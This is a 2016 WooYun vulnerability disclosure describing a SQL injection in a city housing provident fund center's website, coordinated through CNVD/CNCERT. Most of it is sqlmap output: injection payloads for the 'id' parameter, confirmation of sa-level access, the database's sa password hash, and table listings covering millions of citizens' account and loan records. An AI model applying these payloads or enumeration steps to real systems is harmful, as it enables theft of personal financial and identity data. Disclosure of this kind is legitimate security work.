当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191218

漏洞标题:某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

相关厂商:某市住房公积金管理中心

漏洞作者: 路人甲

提交时间:2016-04-01 00:00

修复时间:2016-05-20 18:40

公开时间:2016-05-20 18:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开

简要描述:

如题、、、

详细说明:

某市住房公积金管理中心注入漏洞(SA),泄露700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)。。。
注入点:http://**.**.**.**/List/DownLoadCenterDetails?id=5EBC88CC-A248-41FD-9703-7FD6CC454628 用神器SQLMAP 跑了一下发现SA权限、、、直接可以跑出大量敏感的信息,包括公积金金额、居民身份证、名字、所在单位公司名字等等信息。。。
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| dbo.Fq_PersonAccountDetails | 7130445 |
| dbo.Fq_LoanDetails | 889789 |
| dbo.Fq_FundAccountsInfo | 580320 |
| dbo.Im_PFAccountContrast | 575657 |

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' AND 9621=9621 AND 'EhJf'='
EhJf
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' WAITFOR DELAY '0:0:5'--
---
[07:57:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] GIOT_QZgjj
[*] master
[*] model
[*] msdb
[*] tempdb
current database:    'GIOT_QZgjj'
current user:    'sa'
database management system users password hashes:
[*] sa [1]:
    password hash: 0x01004086ceb659f0af51ae621f0e86391ef163ba496c273d29ec
        header: 0x0100
        salt: 4086ceb6
        mixedcase: 59f0af51ae621f0e86391ef163ba496c273d29ec
[09:10:38] [INFO] testing if current user is DBA
database management system users privileges:
[*] sa (administrator)
Database: GIOT_QZgjj
[88 tables]
+-------------------------------------+
| Bi_Company                          |
| Bi_CompanySort                      |
| Bi_Department                       |
| Bi_DicType                          |
| Bi_DicValue                         |
| Bi_EmployeeInfo                     |
| Bi_NotWorkDay                       |
| Bi_Position                         |
| Cp_OverviewManagement               |
| Cp_ProvidentFundCard                |
| Cs_LendingRates                     |
| Cs_LendingYearRates                 |
| Fq_AccountsSMS                      |
| Fq_CompanyAccountsInfo              |
| Fq_CompanyAcountsInfoPro            |
| Fq_FundAccountsInfo                 |
| Fq_FundAccountsInfoPro              |
| Fq_LoanAccount                      |
| Fq_LoanAccountContrast_V            |
| Fq_LoanAccountPro                   |
| Fq_LoanAccountProNew_V              |
| Fq_LoanAccountProNo_V               |
| Fq_LoanBank                         |
| Fq_LoanDetailSMS                    |
| Fq_LoanDetails                      |
| Fq_LoanDetailsPro                   |
| Fq_LoanHandleProgress               |
| Fq_LoanHandleProgressPro            |
| Fq_ManagementDept                   |
| Fq_PFPersonAccountProNo_V           |
| Fq_PersonAccountDetails             |
| Fq_PersonAccountDetailsPro          |
| Fq_PersonAccountNew_V               |
| Fq_WhichLinks                       |
| Ic_ComplaintsRights                 |
| Ic_ConsultingInteractive            |
| Ic_ReplyQuestion                    |
| Im_AnnouncementPublicity            |
| Im_CanGoodsProperty                 |
| Im_CategoryManagement               |
| Im_CustomerInfo                     |
| Im_DownloadCenter                   |
| Im_Floatage                         |
| Im_FundCreditBlacklist              |
| Im_GovernmentInformationDisclosure  |
| Im_LawGuide                         |
| Im_Links                            |
| Im_PFAccountContrast                |
| Im_PaymentHandlingProgressPublicity |
| Im_PoliciesRegulations              |
| Im_RotationDiagram                  |
| Im_SearchKeywords                   |
| Im_SpecialTopic                     |
| Im_VerificationManage               |
| Im_WorkDynamics                     |
| Pf_AccountContrast_V                |
| Rs_HomeServiceReservationManage     |
| Rs_ReservationManage                |
| Rs_ReservationManageDepartment      |
| Rs_ReservationNumberLimit           |
| Rs_SMSTemplates                     |
| Sa_ControlInfo                      |
| Sa_LoginControl                     |
| Sa_ParameterConfiguration           |
| Sa_Privilege_Company_Handle         |
| Sa_UpdateLog                        |
| Sa_UserInfo                         |
| Sh_ComCustomerInfo                  |
| Sh_Persom                           |
| Sh_PersonChangePayListDetail        |
| Sh_PersonFundChangeDetail           |
| Sh_Settings                         |
| bo.Sh_PersonFundChange              |
| sa_LogError                         |
| sa_LogHandle                        |
| sa_LogHandle_Report                 |
| sa_LogLoa                           |
| sa_LogLogin_Report                  |
| sa_Menu_Handle_Tree_View            |
| sa_OnLiner                          |
| sa_Role_User                        |
| sa_Role_User_v                      |
| sa_handle_Guid                      |
| sa_menu_Guid                        |
| sa_privilege_Handle                 |
| sa_privilege_Handle_v               |
| sa_role                             |
| sa_user_menu                        |
+-------------------------------------+


2.png


3.png


4.png


5.png


漏洞证明:

具体的跑出的数据如下:

Database: GIOT_QZgjj
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| dbo.Fq_PersonAccountDetails             | 7130445 |
| dbo.Fq_LoanDetails                      | 889789  |
| dbo.Fq_FundAccountsInfo                 | 580320  |
| dbo.Im_PFAccountContrast                | 575657  |
| dbo.Im_VerificationManage               | 273258  |
| dbo.Fq_AccountsSMS                      | 209707  |
| dbo.Pf_AccountContrast_V                | 120413  |
| dbo.Fq_LoanHandleProgress               | 97543   |
| dbo.Im_CustomerInfo                     | 63783   |
| dbo.Fq_LoanAccount                      | 60268   |
| dbo.Fq_LoanDetailSMS                    | 55956   |
| dbo.Fq_LoanAccountContrast_V            | 22150   |
| dbo.Fq_LoanDetailsPro                   | 4200    |
| dbo.Ic_ConsultingInteractive            | 1714    |
| dbo.Sa_LoginControl                     | 1160    |
| dbo.sa_OnLiner                          | 475     |
| dbo.sa_privilege_Handle                 | 438     |
| dbo.sa_privilege_Handle_v               | 438     |
| dbo.Ic_ReplyQuestion                    | 330     |
| dbo.Im_SpecialTopic                     | 321     |
| dbo.sa_Menu_Handle_Tree_View            | 287     |
| dbo.Im_WorkDynamics                     | 285     |
| dbo.sa_LogError                         | 252     |
| dbo.sa_handle_Guid                      | 202     |
| dbo.sa_LogHandle                        | 116     |
| dbo.Im_AnnouncementPublicity            | 114     |
| dbo.Im_CanGoodsProperty                 | 105     |
| dbo.sa_menu_Guid                        | 85      |
| dbo.Ic_ComplaintsRights                 | 84      |
| dbo.Im_PoliciesRegulations              | 74      |
| dbo.Im_CategoryManagement               | 65      |
| dbo.Sh_Settings                         | 52      |
| dbo.Rs_ReservationManage                | 50      |
| dbo.Im_LawGuide                         | 45      |
| dbo.Fq_LoanBank                         | 34      |
| dbo.Im_DownloadCenter                   | 25      |
| dbo.Im_GovernmentInformationDisclosure  | 19      |
| dbo.Cp_ProvidentFundCard                | 14      |
| dbo.Fq_ManagementDept                   | 13      |
| dbo.Im_PaymentHandlingProgressPublicity | 13      |
| dbo.sa_LogLogin_Report                  | 12      |
| dbo.Sa_UserInfo                         | 12      |
| dbo.Rs_HomeServiceReservationManage     | 11      |
| dbo.Rs_ReservationManageDepartment      | 11      |
| dbo.Bi_EmployeeInfo                     | 10      |
| dbo.Im_RotationDiagram                  | 10      |
| dbo.Rs_ReservationNumberLimit           | 10      |
| dbo.sa_Role_User                        | 10      |
| dbo.sa_Role_User_v                      | 10      |
| dbo.Im_Links                            | 9       |
| dbo.Fq_WhichLinks                       | 8       |
| dbo.Rs_SMSTemplates                     | 7       |
| dbo.Sa_ControlInfo                      | 7       |
| dbo.Sa_Privilege_Company_Handle         | 7       |
| dbo.Sa_ParameterConfiguration           | 6       |
| dbo.Im_SearchKeywords                   | 4       |
| dbo.sa_LogHandle_Report                 | 4       |
| dbo.Bi_Company                          | 3       |
| dbo.Bi_Department                       | 3       |
| dbo.Bi_DicType                          | 3       |
| dbo.Bi_DicValue                         | 3       |
| dbo.Cp_OverviewManagement               | 3       |
| dbo.Bi_CompanySort                      | 2       |
| dbo.Cs_LendingYearRates                 | 2       |
| dbo.sa_role                             | 2       |
| dbo.Sh_ComCustomerInfo                  | 2       |
| dbo.Sh_PersonChangePayListDetail        | 2       |
| dbo.Bi_NotWorkDay                       | 1       |
| dbo.Cs_LendingRates                     | 1       |
| dbo.Im_Floatage                         | 1       |
+-----------------------------------------+---------+


5.png


6.png


7.png


修复方案:

过滤吧、、、

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-05 18:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置.

最新状态:

暂无